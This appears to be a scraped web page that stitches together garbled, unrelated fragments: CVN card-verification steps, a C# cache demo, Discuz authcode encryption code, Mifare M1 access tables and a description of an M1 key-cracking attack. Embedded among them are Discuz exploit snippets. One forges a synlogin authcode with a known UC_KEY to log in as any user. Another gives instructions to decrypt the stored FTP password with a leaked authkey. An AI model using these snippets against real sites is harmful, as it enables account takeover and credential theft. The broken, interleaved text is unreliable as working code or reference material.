When CVN is calculated, two 64-bit verification keys, Keya and keyb, are used.
1) Data Sources for CVN calculation include: Primary Account (PAN), downtime, and Service Code, which are arranged from left to right.
4123456789012345 + 8701 + 111
2) Extend the data source to 128-bit binary data (less than 128-bit right-complement binary 0 ).
41234567890123458701111 + 000000000
3) divide 128-bit binary data into two 64-bit data blocks. The leftmost 64
cache later.Next, we add some code to test the cache1 static void Main (string[] args) 2 {3 4 var cache = cachefactory.build ("Getstartedcache", settings = 5 { 6 settings. Withsystemruntimecachehandle ("Handlename"); 7 }); 8 9 cache. ADD ("Keya", "Valuea"), ten cache. Put ("KeyB"), one cache. Update ("KeyB", V = +), Console.WriteLine ("Keya is" + cache. Get ("Keya"));
plaintext will generate different ciphertext is dependent on the dynamic key$ckey _length = 4; Secret key$key = MD5 ($key? $key: $GLOBALS [' Discuz_auth_key ']); Key A will participate in encryption and decryption$keya = MD5 (substr ($key, 0, 16));Key B will be used for data integrity verification.$KEYB = MD5 (substr ($key, 16, 16));Key C is used to change the generated ciphertext$KEYC = $ckey _length? ($operation = = ' DECODE '? substr ($string, 0,
('_username','username','_nickname','admin_username','sys_lang'))) { // site_model auth$value = safe_replace($value);}
Return $ value; we can see that the Cookie parameter name is encrypted by the sys_auth function, so the injection is actuallyHttp://www.wooyun.org/bugs/wooyun-2015-0105242The injection caused by AuthKey leakage is similar.0x02 vulnerability ExploitationThe weakness of this vulnerability lies in the fact that you must know the authkey in advance, but I believe you all have their
', '20140901', (2592000*365 ));......UC_KEY is not initialized as null, so it is equivalent that someone else knows your UC_KEY and can perform operations directly, as it is ridiculous to initialize some applications as 123456, after you get your source code, don't you know it again?Proof of vulnerability:Exp:Error_reporting (0 );$ Username = $ argv [1];$ Key = '';$ Code = 'time = 1356796800 username = '. $ username.' uid = 0 action = synlogin ';Echo "$ code \ n ";$ Exp = urlencode (authcode
Modify and execute the following program to obtain the FTP password of the Discuz remote attachment.
$ Authkey = xxxxxxxxxxxxxxxxxx; // The Setting table is saved. If you have the permission to back up data, you can go down and check it out.$ Discuz_auth_key = md5 ($ authkey. $ _ SERVER [HTTP_USER_AGENT]);$ String = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; // This is the encrypted string in the FTP Password stored in the Setting table.$ Password = authcode ($ string, DECODE, m
);
}
Php obtains the file extension:
C/C ++ Code: copy the content to the clipboard.
/**
* @ Get the file extension
* @ $ Pic string Image path
*/
Function get_file_ext ($ pic ){
Return substr ($ pic, strrpos ($ pic, '.') + 1 );
}
There is also a reversible encryption and decryption function (the same string will be encrypted into different strings for good use)
Copy content from PHP Code to clipboard
/**
* String encryption
* @ Param $ string the
authcode.
Parameter interpretation//$string: PlainText or ciphertext//$operation: Decode for decryption, other means encryption//$key: Key//$expiry: Ciphertext validity function Authcode ($str ing, $operation = ' DECODE ', $key = ', $expiry = 0) {//dynamic key length, the same plaintext will generate different ciphertext is dependent on the dynamic key $ckey _length = 4; Key $key = MD5 ($key? $key: $GLOBALS [' Discuz_auth_key ']); Key A will participate in the encryption
B is correct, it can be written. You cannot perform value-added or impairment operations.
7. The access control of Block 3 is different from that of data blocks (blocks 0, 1, and 2). Its access control is as follows:
Password A access control password B
C13C23C33ReadWrite ReadWriteReadWrite
000NeverKeyA | BKeyA | BNeverKeyA | BKeyA | B
010NeverNeverKeyA | BNeverKeyA | BNever
100NeverKeyBKeyA | BNeverNeverKeyB
110NeverNeverKeyA | BNeverNeverNever
001NeverKeyA | BKeyA | B
011NeverKeyBKeyA | BKe
the 32-bit of other keys and then conduct an exhaustive attack on the other 16-bit keys. Only three certifications are required (Time is negligible ). The offline attack takes about one second. The M1 card nested authentication vulnerability allows an attacker to easily crack any other sector's key after learning the key of a sector, so as to completely crack the card. This was not easy to achieve in previous attacks, because the card reader of an application system may not generate keys for al
($ string, $ operation = 'Decode', $ key = '', $ expiry = 3600 ){
$ Ckey_length = 4;
// The random key length ranges from 0 to 32;
// Adding a random key can make the ciphertext irregular. even if the original text and the key are identical, the encryption results will be different each time, increasing the difficulty of cracking.
// The larger the value, the larger the ciphertext change law. The ciphertext change is equal to the power of $ ckey_length of 16.
// When this value is 0, no random
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.